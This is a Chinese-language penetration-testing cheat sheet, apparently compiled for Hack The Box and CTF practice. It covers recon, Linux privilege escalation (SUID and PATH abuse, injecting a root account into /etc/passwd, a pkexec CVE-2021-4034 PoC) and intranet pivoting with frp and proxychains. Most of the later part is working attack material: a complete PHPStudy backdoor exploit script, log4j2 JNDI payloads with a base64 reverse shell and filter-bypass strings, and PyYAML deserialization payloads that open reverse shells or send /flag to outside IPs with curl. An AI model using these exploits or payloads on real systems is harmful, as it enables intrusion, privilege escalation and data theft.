渗透

​

渗透（Hack The Box / HTB）

信息泄露

git

如存在 .git 泄露：

githacker --url http://x.x.x.x/ --output-folder test

查看历史commits：git commit

回退到上一个版本：git reset --hard HEAD^

​

扫描

nmap

nmap -sC -sV xx.xx.xx.xx -oA src/

-sC is for using default nmap scripts,

-sV for enumerating services versions,

-oA is for output ALL format and specify the directory src,

NOTICE: you may be adding -Pn if you have an error wait for some time and here is the result.

​

终端

将简单的Shell转换成为完全交互式的TTY：

python -c 'import pty;pty.spawn("/bin/bash")'

​

提权

参考：GTFOBins

SUID提权（4000权限）

SUID可以让调用者以文件拥有者的身份运行该文件，所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件，那么我们运行该文件的时候就得获得root用户的身份了。

发现系统上运行的所有SUID可执行文件，不同系统适用于不同的命令：

find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

环境变量

#/home/raj/script/shell具SUID权限
cd /tmp
echo “/bin/bash” > ps
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH
cd /home/raj/script
./shell
whoami

#/home/raj/script/shell具SUID权限，且shell中用system命令执行了service指令
echo '#!/bin/bash'>service
echo '/bin/bash'>>service
export PATH=/home/raj/script:$PATH
chmod +x service
./shell

find

# 普通用户，进入到/tmp目录下，然后新建一个文件
touch abcd
find abcd -exec whoami \;

/etc/shadow

xxd "/etc/shadow" | xxd -r

/etc/passwd

cat /etc/passwd>passwd
echo "test:abRcsZmlrrKFA:0:0:,,,:/root:/bin/bash" >>passwd
cp passwd /etc/passwd
python3 -c 'import pty; pty.spawn("/bin/bash")'
su - test

nl

nl /flag

date

/usr/bin/date -f /flag （利用date命令的 -f 参数读取文件）

curl

curl file:///flag

cp

cp /flag /dev/stdout

gzip

gzip -f /flag -t

wc

wc --files0-from /flag

python

python -c 'import os;os.system("/bin/sh")'

python -c 'import pty;pty.spawn("/bin/sh")'

以其他用户运行命令

sudo -l （查看此用户拥有的特殊权限，如 NOPASSWD，路径 /etc/sudoer.d）

echo password | su -c userB cat xxx.txt

根目录非root权限

ls -al / （检查根目录权限是否非root）

mv bin bin1
/bin1/mkdir bin
/bin1/chmod 777 bin
/bin1/echo "/bin1/cat /flag" > /bin/umount
/bin1/chmod 777 /bin/umount
exit

pkexec提权漏洞

/usr/lib/policykit-1/polkit-agent-helper-1

https://github.com/arthepsy/CVE-2021-4034

chmod +x ./pkexec_poc
./pkexec_poc

​

非常规读文件

/lib/gcc/x86_64-linux-gnu/[id]/cc1 /etc/passwd -o /dev/null
/lib/gcc/x86_64-linux-gnu/[id]/cc1plus /etc/passwd -o /dev/null

​

内网穿透

• 探测内网主机

  for k in $( seq 1 255);do ping -c 1 10.203.113.$k|grep "ttl"|awk -F "[ :]+" '{print $4}'; done

• 常见端口扫描

  EW代理：./ew_for_linux64 -s ssocksd -l 9999

  扫描：proxychains3 nmap 扫描常见端口

• 操作

  远程连接数据库：proxychains3 mysql -h 10.203.113.33 -u ctf -p

  启动火狐浏览器：proxychains3 firefox

  远程连接：proxychains3 rdesktop 10.203.113.34:3389

proxychains

ProxyChains是Linux和其他Unix下的代理工具。 它可以使任何程序通过代理上网， 允许TCP和DNS通过代理隧道， 支持HTTP、 SOCKS4和SOCKS5类型的代理服务器， 并且可配置多个代理。 ProxyChains通过一个用户定义的代理列表强制连接指定的应用程序， 直接断开接收方和发送方的连接。

配置文件：/etc/proxychains.conf，在末尾添加代理。

frp

frp 是一个专注于内网穿透的高性能的反向代理应用，支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。

项目地址 https://github.com/fatedier/frp/blob/master/README_zh.md

目录文件：

frpc 客户端可执行程序
frpc_full.ini 客户端所有配置项（可以再此文件查看frp的所有的配置项）
frpc.ini 客户端配置项
frps 服务端可执行程序
frps_full.ini 服务端所有配置项（可以再此文件查看frp的所有的配置项）
frps.ini 服务端配置项
LICENSE 许可证

服务端配置（ frps.ini 文件）

[common]
bind_port = 7000 # 客户端跟服务端绑定的端口号（端口可自定义，需客户端和服务端统一）
vhost_http_port = 6001 # 访问6001端口，映射到内网web服务

启动： ./frps -c frps.ini

客户端配置（ frpc.ini 文件）

[common]
server_addr = x.x.x.x # 服务器公网IP
server_port = 7000 # 绑定的端口，自定义，与服务端一致即可

[ssh]
type = tcp
local_ip = 127.0.0.1 # 绑定的IP，本机填写127.0.0.1即可
local_port = 22
remote_port = 6008 # ssh默认是22，转发为6008端口
# 访问：ssh root@x.x.x.x -p 6008

[web]
type = http
local_port = 8080 # 访问本地8080web服务
custom_domains = x.x.x.x # 已经备案的域名或服务器公网IP
# 访问：http://x.x.x.x:6001 => http://127.0.0.1:8080

[mysql]
type = tcp
local_ip = 127.0.0.1 # 绑定的IP，本机填写127.0.0.1即可
local_port = 3306
remote_port = 4406 # mysql默认是3306，转发为4406端口
# 访问：mysql -hx.x.x.x -P4406 -uroot -proot

启动： ./frpc -c frpc.ini

​

其他

PHPStudy 后门漏洞

import requests
import base64
from random import choice

USER_AGENTS = [
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
    "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
    "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
    "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
    "Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
    "Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5",
    "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
    "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.11 TaoBrowser/2.0 Safari/536.11",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E; LBBROWSER)",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 LBBROWSER",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; 360SE)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
    "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
    "Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; zh-cn) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre",
    "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11",
    "Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10"
]
TIME_OUT=10

print(r"""
 _____   _    _  _____    _____  _               _          ____                _        _                     
 |  __ \ | |  | ||  __ \  / ____|| |             | |        |  _ \              | |      | |                    
 | |__) || |__| || |__) || (___  | |_  _   _   __| | _   _  | |_) |  __ _   ___ | | __ __| |  ___    ___   _ __ 
 |  ___/ |  __  ||  ___/  \___ \ | __|| | | | / _` || | | | |  _ <  / _` | / __|| |/ // _` | / _ \  / _ \ | '__|
 | |     | |  | || |      ____) || |_ | |_| || (_| || |_| | | |_) || (_| || (__ |   <| (_| || (_) || (_) || |   
 |_|     |_|  |_||_|     |_____/  \__| \__,_| \__,_| \__, | |____/  \__,_| \___||_|\_\\__,_| \___/  \___/ |_|   
                                                      __/ |                                                     
                                                     |___/                                                      
                    Usage & e.g. :
                        Target Url:
                        localhost/flag.php
                        Input Your Command:
                        phpinfo();
                    Notice: Command Must Be PHP Function, If You Want To Execute OS Command, Use: system('YOUR COMMAND');
                    By:Sp4ce
                    Have Fun
""")

def checkTarget(url):
    poc = {
            "Accept-Charset": "cGhwaW5mbygpOw==",
            "Accept-Encoding": "gzip,deflate"
        }
    try:
        pocRequest = requests.get(url, headers=poc,timeout=TIME_OUT)
        if "phpinfo" in str(pocRequest.content):
            print('[+] Target is vulnerable.')
            return True
        else:
            print('[-] Target is NOT vulnerable.')
            return False
    except :
        print('[-] Looks Like Something Wrong.')


def exploit(url,command):
    headers = {}
    headers['User-Agent'] = choice(USER_AGENTS)
    headers['Accept-Encoding'] = 'gzip,deflate'
    headers['Accept-Charset'] = command
    try:
        request = requests.get(url, headers=headers)
        if request.status_code == 200:
            print('[+] Command Execute Successful.')
            print(request.text)
        else:
            print('[-] Looks Like Something Wrong. Maybe target is NOT vulnerable.')
    except:
        print('[-] Looks Like Something Wrong.\n')


if __name__ == "__main__":
    while True:
        url = input("Target Url:\n")
        if 'http' not in url:
            url = "http://" + url
        print('[i] Checking Target...')
        if checkTarget(url):
            cmd = input("Input Your Command:\n")
            command = base64.b64encode(cmd.encode('utf-8'))
            exploit(url,command)

zerodium 后门

列目录：User-Agentt: zerodiumsystem('ls /');

读文件：User-Agentt: zerodiumsystem('cat /flag');

log4j2 漏洞（CVE-2021-44228）

步骤：

1. 在vps上通过 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar 启动监听

   java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny54eHgueHh4LjIyMC8yMzMzIDA+JjE=}|{base64,-d}|{bash,-i}" -A "47.xxx.xxx.220"
   
   # YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny54eHgueHh4LjIyMC8yMzMzIDA+JjE= 为 bash -i >& /dev/tcp/47.xxx.xxx.220/2333 0>&1, 用于反弹shell

2. 将payload填入找到的漏洞处

   ${jndi:ldap:${sys:file.separator}${sys:file.separator}47.xxx.xxx.220:1389${sys:file.separator}ge5udq}

参考：Apache Log4j2漏洞复现-反弹shell

绕过：

${jndi:ladp://xxxxxx.dnslog.cn/exp}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://xxxxxx.dnslog.cn/exp}
${${::-j}ndi:rmi://xxxxxx.dnslog.cn/exp}
${jndi:rmi://xxxxxx.dnslog.cn}
${${lower:jndi}:${lower:rmi}://xxxxxx.dnslog.cn/exp}
${${lower:${lower:jndi}}:${lower:rmi}://xxxxxx.dnslog.cn/exp}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://xxxxxx.dnslog.cn/exp}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxx.dnslog.cn/exp}

PyYAML漏洞（CVE-2020-1747）

版本：5.3

# pyyaml==5.3 required. Vulnerability has been fixed in 5.3.1
# More: ret2libc's report in https://github.com/yaml/pyyaml/pull/386
# Explanation: https://2130706433.net/blog/pyyaml/
from yaml import *

with open('payload.yaml','rb') as f:
  content = f.read()

data = load(content, Loader=FullLoader) # Using vulnerable FullLoader

RCE：

!!python/object/new:str
    args: []
    state: !!python/tuple
      - "__import__('os').system('bash -c \"bash -i >& /dev/tcp/IP/PORT <&1\"')"
      - !!python/object/new:staticmethod
        args: []
        state:
          update: !!python/name:eval
          items: !!python/name:list

# payload.yaml
# The `extend` function is overriden to run `yaml.unsafe_load` with 
# custom `listitems` argument, in this case a simple curl request

- !!python/object/new:yaml.MappingNode
  listitems: !!str '!!python/object/apply:subprocess.Popen [["curl", "http://127.0.0.1/rce"]]'
  state:
    tag: !!str dummy
    value: !!str dummy
    extend: !!python/name:yaml.unsafe_load

!!python/object/new:tuple [!!python/object/new:map [!!python/name:eval ,
["\x5f\x5fimport\x5f\x5f('os')\x2esystem('curl http://xxx.xxx.xxx.xxx:1234 -d
@/flag')"]]]

!!python/object/new:type
 args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
 listitems: "__import__('os').system('curl -d @/flag http://111.111.111.111:8082')"

参考：

浅谈PyYAML反序列化漏洞

PyYAML反序列化防御和ByPass

uiuctf 2020

Development Server源码泄露（CNVD-2023-05738）

PHP<=7.4.21 Development Server源码泄露漏洞

PHP Development Server存在信息泄露漏洞，该漏洞源于php cli server begin send static在解析http请求时存在逻辑漏洞，攻击者可利用该漏洞将两个请求拼接至一个http请求中导致服务器将php文件作为静态文件返回。

GET /A.php HTTP/1.1\r\n
Host: 1.1.1.1:8888\r\n
\r\n
\r\n
GET / HTTP/1.1\r\n
\r\n

参考：

PHP Development Server <= 7.4.21 - Remote Source Disclosure